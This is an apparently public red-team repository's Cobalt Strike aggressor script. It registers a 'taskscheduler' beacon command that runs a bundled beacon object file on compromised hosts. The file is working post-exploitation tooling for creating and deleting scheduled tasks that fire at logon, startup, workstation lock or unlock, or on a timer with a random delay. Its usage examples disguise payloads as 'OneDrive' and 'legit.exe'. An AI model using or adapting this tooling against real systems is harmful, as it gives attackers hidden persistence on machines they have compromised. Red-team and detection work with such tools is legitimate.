Главная Обзор Помощь
Вход
zhensolid
/
OperatorsKit
1
0
Ответвить 0
Файлы Задачи 0 Запросы на слияние 0 Вики
Дерево: e30c1ed8ee
Ветки Метки
OperatorsKit
/
KIT
/
TaskScheduler
/
taskscheduler.cna

taskscheduler.cna 6.4 KB
История Исходник

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112 
  1. # author REDMED-X
    2. 

  2. 

  3. beacon_command_register(
    4. 

  4. 	"taskscheduler", "Create or delete a scheduled task.\n",
    5. 

  5. 	"INFO:\nCreate or delete a scheduled task.\n\n" .
    6. 

  6. 	"BASIC PARAMETERS:\n[create]: Indicate that you want to create a new scheduled task.\n[delete]: Indicate that you want to delete an existing scheduled task.\n[taskName]: The name of the scheduled task.\n[programPath]: Path to the program that you want to run like: C:\\Windows\\System32\\cmd.exe.\n[programArguments]: Arguments that you want to pass to the program like: \"/c C:\\Windows\\System32\\calc.exe\" or \"\" to leave it empty.\n[triggerType]: The trigger that signals the execution like: onetime, daily, logon, startup, lock, unlock. For more information, check the TRIGGER OPTIONS below.\n\n" .
    7. 

  7. 	"TRIGGER OPTIONS:\n[onetime]: Create task with trigger \"On a schedule one time\".\n[daily]: Create task with trigger \"On a schedule daily.\"\n[logon]: Create task with trigger \"At log on\" (requires admin privs if set for another user or all users).\n[startup]: Create task with trigger \"At startup\" (requires admin privs).\n[lock]: Create task with trigger \"On workstation lock\" (requires admin privs if set for another user or all users).\n[unlock]: Create task with trigger \"On workstation unlock\" (requires admin privs if set for another user or all users).\n\n" .
    8. 

  8. 	"TRIGGER SPECIFIC PARAMETERS:\n[startTime]: Start time of the trigger in format: 2023-03-24T12:08:00.\n[expireTime]: Expiration time of the trigger in format: 2023-03-24T12:08:00.\n[daysInterval]: Interval in number of days. For example: 1 or 3.\n[delay]: Random time delay after the start time in which the trigger is hit. Use format \"PT2H\" for hours and \"PT15M\" for minutes.\n[userID]: Specify the user for which the trigger is set in format: \"DOMAIN\\username\" for domain users, \"username\" for local system users and \"\" for all users (requires admin privs if set for another user or all users).\n\n" .
    9. 

  9. 	"USAGE:\ntaskscheduler create <taskName> <programPath> \"<(optional) programArguments>\" onetime <startTime>\ntaskscheduler create <taskName> <programPath> \"<(optional) programArguments>\" daily <startTime> <(optional) expireTime> <(optional) daysInterval> <(optional) delay>\ntaskscheduler create <taskName> <programPath> \"<(optional) programArguments>\" logon <(optional) userID>\ntaskscheduler create <taskName> <programPath> \"<(optional) programArguments>\" startup <(optional) delay>\ntaskscheduler create <taskName> <programPath> \"<(optional) programArguments>\" lock <(optional) userID> <(optional) delay>\ntaskscheduler create <taskName> <programPath> \"<(optional) programArguments>\" unlock <(optional) userID> <(optional) delay>\ntaskscheduler delete <taskName>\n\n" .
    10. 

  10. 	"EXAMPLES:\ntaskscheduler create TestTask C:\\Windows\\System32\\cmd.exe \"/c C:\\Windows\\System32\\calc.exe\" daily 2023-03-24T12:08:00 2023-03-28T12:14:00 1 PT2H\ntaskscheduler create NewTask C:\\Users\\Public\\Downloads\\legit.exe \"\" logon Testdomain\\Administrator\ntaskscheduler create OneDrive C:\\Data\\OneDrive.exe \"\" unlock \"\" PT5M\ntaskscheduler delete TestTask\n\n");
    11. 

  11. 	
    12. 

  12. alias taskscheduler {
    13. 

  13.     $bid = $1;
    14. 

  14.     $action = $2;
    15. 

  15. 	$taskName = $3; 
    16. 

  16.     $programPath = $4;
    17. 

  17.     $programArguments = $5;
    18. 

  18. 	$triggerType = $6; 
    19. 

  19. 	$optionalArg1 = $7;
    20. 

  20. 	$optionalArg2 = $8;
    21. 

  21. 	$optionalArg3 = $9;
    22. 

  22. 	$optionalArg4 = $10;
    23. 

  23. 

  24. 

  25. 	# Verify user input
    26. 

  26. 	if ($action eq "create" || $action eq "delete") {
    27. 

  27. 		if($action eq "delete") {
    28. 

  28. 			if ($taskName eq "") {
    29. 

  29. 				berror($bid, "Please specify the name of the scheduled task that you want to delete.\n");
    30. 

  30. 				return;
    31. 

  31. 			}
    32. 

  32. 		}
    33. 

  33. 		if($action eq "create") {
    34. 

  34. 		
    35. 

  35. 			if ($taskName eq "") {
    36. 

  36. 				berror($bid, "Please specify a name for the new scheduled task.\n");
    37. 

  37. 				return;
    38. 

  38. 			}
    39. 

  39. 			
    40. 

  40. 			if ($programPath eq "") {
    41. 

  41. 				berror($bid, "Please specify the path to the program that you want to run\n");
    42. 

  42. 				return;
    43. 

  43. 			}
    44. 

  44. 			
    45. 

  45. 			if ($triggerType eq "") {
    46. 

  46. 				berror($bid, "Please specify one of the following trigger options: onetime | daily | logon | startup | lock | unlock\n");
    47. 

  47. 				return;
    48. 

  48. 			}
    49. 

  49. 			
    50. 

  50. 			if ($triggerType eq "onetime" || $triggerType eq "daily" || $triggerType eq "logon" || $triggerType eq "startup" || $triggerType eq "lock" || $triggerType eq "unlock") {
    51. 

  51. 				if ($triggerType eq "onetime") {
    52. 

  52. 					if ($optionalArg1 eq "") {
    53. 

  53. 						berror($bid, "Please specify the start time of the task in the following format: 2023-03-24T12:08:00.\n");
    54. 

  54. 						return;
    55. 

  55. 					}
    56. 

  56. 				}
    57. 

  57. 				if ($triggerType eq "daily") {
    58. 

  58. 					if ($optionalArg1 eq "") {
    59. 

  59. 						berror($bid, "Please specify the start time of the task in the following format: 2023-03-24T12:08:00.\n");
    60. 

  60. 						return;
    61. 

  61. 					}
    62. 

  62. 				}
    63. 

  63. 			}
    64. 

  64. 			else {
    65. 

  65. 				berror($bid, "This trigger option is not supported. Please select one of the following options: onetime | daily | logon | startup | lock | unlock\n");
    66. 

  66. 				return;
    67. 

  67. 			}
    68. 

  68. 		}
    69. 

  69. 	}
    70. 

  70. 	else {
    71. 

  71. 		berror($bid, "Please specify one of the following options: create | delete\n");
    72. 

  72. 		return;
    73. 

  73. 	}
    74. 

  74. 	
    75. 

  75.     # Read in the right BOF file
    76. 

  76.     $handle = openf(script_resource("taskscheduler.o"));
    77. 

  77.     $data   = readb($handle, -1);
    78. 

  78.     closef($handle);
    79. 

  79. 

  80. 	# Pack our arguments
    81. 

  81. 	if ($action eq "delete") {
    82. 

  82.        $arg_data  = bof_pack($bid, "zZ", $action, $taskName);
    83. 

  83. 	   blog($bid, "Tasked to delete scheduled task..");
    84. 

  84.     }
    85. 

  85. 	else {
    86. 

  86. 		blog($bid, "Tasked to create scheduled task..");
    87. 

  87. 		if ($triggerType eq "onetime") {
    88. 

  88. 			$arg_data  = bof_pack($bid, "zZZZzZ", $action, $taskName, $programPath, $programArguments, $triggerType, $optionalArg1);
    89. 

  89. 		}
    90. 

  90. 		if ($triggerType eq "daily") {
    91. 

  91. 			$arg_data  = bof_pack($bid, "zZZZzZZiZ", $action, $taskName, $programPath, $programArguments, $triggerType, $optionalArg1, $optionalArg2, $optionalArg3, $optionalArg4);
    92. 

  92. 		}
    93. 

  93. 		if ($triggerType eq "logon") {
    94. 

  94. 			$arg_data  = bof_pack($bid, "zZZZzZ", $action, $taskName, $programPath, $programArguments, $triggerType, $optionalArg1);
    95. 

  95. 		}
    96. 

  96. 		if ($triggerType eq "startup") {
    97. 

  97. 			$arg_data  = bof_pack($bid, "zZZZzZ", $action, $taskName, $programPath, $programArguments, $triggerType, $optionalArg1);
    98. 

  98. 		}
    99. 

  99. 		if ($triggerType eq "lock") {
    100. 

  100. 			$arg_data  = bof_pack($bid, "zZZZzZZ", $action, $taskName, $programPath, $programArguments, $triggerType, $optionalArg1, $optionalArg2);
    101. 

  101. 		}
    102. 

  102. 		if ($triggerType eq "unlock") {
    103. 

  103. 			$arg_data  = bof_pack($bid, "zZZZzZZ", $action, $taskName, $programPath, $programArguments, $triggerType, $optionalArg1, $optionalArg2);
    104. 

  104. 		}
    105. 

  105. 	}
    106. 

  106. 	
    107. 

  107.     beacon_inline_execute($bid, $data, "go", $arg_data);
    108. 

  108. 

  109. }
    110. 

  110. 

  111. 

  112.